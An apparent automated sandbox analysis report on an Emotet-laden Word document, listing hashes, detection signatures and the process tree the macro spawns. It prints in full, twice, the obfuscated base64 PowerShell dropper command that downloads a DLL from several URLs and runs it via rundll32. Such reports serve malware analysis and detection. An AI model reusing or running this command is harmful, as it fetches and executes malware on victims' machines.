Play interactive tour

Edit tour

Analysis Report DAT.doc

Overview

General Information

Sample Name:	DAT.doc
Analysis ID:	344355
MD5:	6792d7fd9d2f9237cd31d1234edcec03
SHA1:	af8329cc3d379f678aac5f2a1b83a7697dd190af
SHA256:	55f177ec4613b1b03a37199e3c7d49336dd424a66737f79005208aa9883b192b
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to delete services

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1820 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2332 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgAJwAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABAACcAKwAnAGgAdAAnACsAJwB0AHAAcwAnACkAKQArACgAKAAnADoAJwArACcAcQAnACsAJwBxACkAKABzADIAKQAnACkAKQArACgAJwAoACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBqAG8AaABuAGgAYQAnACsAJwB5ACcAKQApACsAKAAnAGQAZQBuACcAKwAnAHcAcgAnACsAJwBpACcAKQArACgAJwB0AGUAJwArACcAcwAnACkAKwAnAC4AJwArACcAYwBvACcAKwAoACgAJwBtACcAKwAnAHEAcQAnACsAJwApACcAKwAnACgAcwAyACkAKAB0AHIAYQBjAGsAXwB1ACcAKQApACsAKAAnAHIAbAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoACcAKwAnAHMAMgApACcAKwAnACgAUAAnACsAJwBxAHEAKQAnACkAKQArACgAJwAoAHMAJwArACcAMgApACcAKQArACcAKAAnACsAKAAnAEAAJwArACcAaAAnACsAJwB0AHQAcABzADoAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACcAKAAnACsAJwBzADIAKQAnACkAKwAnACgAJwArACgAKAAnAHEAJwArACcAcQApACgAJwArACcAcwAnACsAJwAyACkAKABuACcAKQApACsAKAAnAGEAJwArACcAaABsAGEAcwBvAGwAJwArACcAaQAnACsAJwBtACcAKQArACgAJwBhAG4AZABlAHMAJwArACcAaQAnACkAKwAoACcAZwBuACcAKwAnAHMAJwApACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0AcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKwAnACgAbgBhACcAKwAnAGgAbABhADMAJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoACcAKwAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABkAHEAcQApACgAJwArACcAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAQABoAHQAdAAnACsAJwBwACcAKQApACsAKAAoACcAcwAnACsAJwA6AHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAZgAnACsAJwBvAG8AJwApACkAKwAnAHQAJwArACgAJwBiAGEAJwArACcAbABsAC0AJwApACsAKAAoACcAZQBnAC4AYwAnACsAJwBvAG0AJwArACcAcQBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwAyACkAKAB3AGUAJwArACcAYgBfAG0AYQAnACsAJwBwACcAKQApACsAKAAoACcAcQBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAG4AJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoAHMAMgAnACsAJwApACgAQABoACcAKwAnAHQAJwApACkAKwAoACcAdABwACcAKwAnAHMAJwApACsAKAAoACcAOgBxACcAKwAnAHEAKQAoACcAKwAnAHMAMgApACgAcQAnACsAJwBxACkAKAAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAdgAnACkAKQArACcAaQAnACsAJwBlACcAKwAnAHQAbgAnACsAKAAnAGgAYQAnACsAJwBiAGkAJwApACsAKAAoACcAZQAnACsAJwBuAGgAbwBhAC4AYwBvAG0AcQBxACkAJwArACcAKABzADIAJwArACcAKQAoACcAKQApACsAKAAnAHcAbwByACcAKwAnAGQAcAAnACkAKwAoACgAJwByACcAKwAnAGUAcwBzAHEAcQAnACsAJwApACgAcwAnACsAJwAyACcAKQApACsAJwApACcAKwAnACgAJwArACcAUQAnACsAKAAoACcAVQBUAHkAcQAnACsAJwBxACkAKAAnACsAJwBzADIAKQAoACcAKQApACkAKQAuACIAcgBFAGAAUABsAEEAYwBlACIAKAAoACgAKAAoACcAcQAnACsAJwBxACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAYABQAEwASQB0ACIAKAAkAEYANwAzAGcANwA5AG0AIAArACAAJABNAGoANQBuAHAAdwBfACAAKwAgACQASQBjAHcAdQAyADMAOAApADsAJABYAGQAXwBjAHAAdwBfAD0AKAAnAFUAJwArACgAJwBoACcAKwAnAHoAZgBxACcAKQArACcAMgAyACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwB0AF8AYgB1AGQAbAAgAGkAbgAgACQAQwBqADUAawB3AG4AbQAgAHwAIABTAGAATwBSAHQALQBPAGIAagBgAGUAYABDAHQAIAB7AGcARQBgAFQAYAAtAGAAUgBBAG4AZABvAG0AfQApAHsAdAByAHkAewAkAFIAcAA1ADYAegByAGEALgAiAEQATwBXAG4AYABMAE8AYQBkAGYAYABJAGAAbABFACIAKAAkAE8AdABfAGIAdQBkAGwALAAgACQAQwAwAHcANwByAG8ANgApADsAJABNAHAAaQAyAHMAcwA0AD0AKAAoACcAUwAnACsAJwB6AF8AJwApACsAJwB3ACcAKwAoACcAeQBtACcAKwAnADEAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQwAwAHcANwByAG8ANgApAC4AIgBsAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADEAMwA2ACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEMAMAB3ADcAcgBvADYALAAnACMAMQAnAC4AIgBUAGAAbwBgAHMAVABSAEkAbgBnACIAKAApADsAJABFAGsAYwBvAGoAYgB3AD0AKAAoACcAVQBwACcAKwAnAHoAagBnACcAKQArACcAdwB3ACcAKQA7AGIAcgBlAGEAawA7ACQASgBjAG0AdABnAGIAbwA9ACgAKAAnAFIAbgAxACcAKwAnAHgAJwApACsAJwBuAGwAJwArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABqAHIAegA1AGkAPQAoACcAUQAnACsAJwA1ADEAJwArACgAJwBkAGUAYwAnACsAJwB0ACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2508 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 2536 cmdline: POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgAJwAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABAACcAKwAnAGgAdAAnACsAJwB0AHAAcwAnACkAKQArACgAKAAnADoAJwArACcAcQAnACsAJwBxACkAKABzADIAKQAnACkAKQArACgAJwAoACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBqAG8AaABuAGgAYQAnACsAJwB5ACcAKQApACsAKAAnAGQAZQBuACcAKwAnAHcAcgAnACsAJwBpACcAKQArACgAJwB0AGUAJwArACcAcwAnACkAKwAnAC4AJwArACcAYwBvACcAKwAoACgAJwBtACcAKwAnAHEAcQAnACsAJwApACcAKwAnACgAcwAyACkAKAB0AHIAYQBjAGsAXwB1ACcAKQApACsAKAAnAHIAbAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoACcAKwAnAHMAMgApACcAKwAnACgAUAAnACsAJwBxAHEAKQAnACkAKQArACgAJwAoAHMAJwArACcAMgApACcAKQArACcAKAAnACsAKAAnAEAAJwArACcAaAAnACsAJwB0AHQAcABzADoAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACcAKAAnACsAJwBzADIAKQAnACkAKwAnACgAJwArACgAKAAnAHEAJwArACcAcQApACgAJwArACcAcwAnACsAJwAyACkAKABuACcAKQApACsAKAAnAGEAJwArACcAaABsAGEAcwBvAGwAJwArACcAaQAnACsAJwBtACcAKQArACgAJwBhAG4AZABlAHMAJwArACcAaQAnACkAKwAoACcAZwBuACcAKwAnAHMAJwApACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0AcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKwAnACgAbgBhACcAKwAnAGgAbABhADMAJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoACcAKwAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABkAHEAcQApACgAJwArACcAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAQABoAHQAdAAnACsAJwBwACcAKQApACsAKAAoACcAcwAnACsAJwA6AHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAZgAnACsAJwBvAG8AJwApACkAKwAnAHQAJwArACgAJwBiAGEAJwArACcAbABsAC0AJwApACsAKAAoACcAZQBnAC4AYwAnACsAJwBvAG0AJwArACcAcQBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwAyACkAKAB3AGUAJwArACcAYgBfAG0AYQAnACsAJwBwACcAKQApACsAKAAoACcAcQBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAG4AJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoAHMAMgAnACsAJwApACgAQABoACcAKwAnAHQAJwApACkAKwAoACcAdABwACcAKwAnAHMAJwApACsAKAAoACcAOgBxACcAKwAnAHEAKQAoACcAKwAnAHMAMgApACgAcQAnACsAJwBxACkAKAAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAdgAnACkAKQArACcAaQAnACsAJwBlACcAKwAnAHQAbgAnACsAKAAnAGgAYQAnACsAJwBiAGkAJwApACsAKAAoACcAZQAnACsAJwBuAGgAbwBhAC4AYwBvAG0AcQBxACkAJwArACcAKABzADIAJwArACcAKQAoACcAKQApACsAKAAnAHcAbwByACcAKwAnAGQAcAAnACkAKwAoACgAJwByACcAKwAnAGUAcwBzAHEAcQAnACsAJwApACgAcwAnACsAJwAyACcAKQApACsAJwApACcAKwAnACgAJwArACcAUQAnACsAKAAoACcAVQBUAHkAcQAnACsAJwBxACkAKAAnACsAJwBzADIAKQAoACcAKQApACkAKQAuACIAcgBFAGAAUABsAEEAYwBlACIAKAAoACgAKAAoACcAcQAnACsAJwBxACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAYABQAEwASQB0ACIAKAAkAEYANwAzAGcANwA5AG0AIAArACAAJABNAGoANQBuAHAAdwBfACAAKwAgACQASQBjAHcAdQAyADMAOAApADsAJABYAGQAXwBjAHAAdwBfAD0AKAAnAFUAJwArACgAJwBoACcAKwAnAHoAZgBxACcAKQArACcAMgAyACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwB0AF8AYgB1AGQAbAAgAGkAbgAgACQAQwBqADUAawB3AG4AbQAgAHwAIABTAGAATwBSAHQALQBPAGIAagBgAGUAYABDAHQAIAB7AGcARQBgAFQAYAAtAGAAUgBBAG4AZABvAG0AfQApAHsAdAByAHkAewAkAFIAcAA1ADYAegByAGEALgAiAEQATwBXAG4AYABMAE8AYQBkAGYAYABJAGAAbABFACIAKAAkAE8AdABfAGIAdQBkAGwALAAgACQAQwAwAHcANwByAG8ANgApADsAJABNAHAAaQAyAHMAcwA0AD0AKAAoACcAUwAnACsAJwB6AF8AJwApACsAJwB3ACcAKwAoACcAeQBtACcAKwAnADEAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQwAwAHcANwByAG8ANgApAC4AIgBsAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADEAMwA2ACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEMAMAB3ADcAcgBvADYALAAnACMAMQAnAC4AIgBUAGAAbwBgAHMAVABSAEkAbgBnACIAKAApADsAJABFAGsAYwBvAGoAYgB3AD0AKAAoACcAVQBwACcAKwAnAHoAagBnACcAKQArACcAdwB3ACcAKQA7AGIAcgBlAGEAawA7ACQASgBjAG0AdABnAGIAbwA9ACgAKAAnAFIAbgAxACcAKwAnAHgAJwApACsAJwBuAGwAJwArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABqAHIAegA1AGkAPQAoACcAUQAnACsAJwA1ADEAJwArACgAJwBkAGUAYwAnACsAJwB0ACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 260 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1 MD5: DD81D91FF3B0763C392422865C9AC12E)

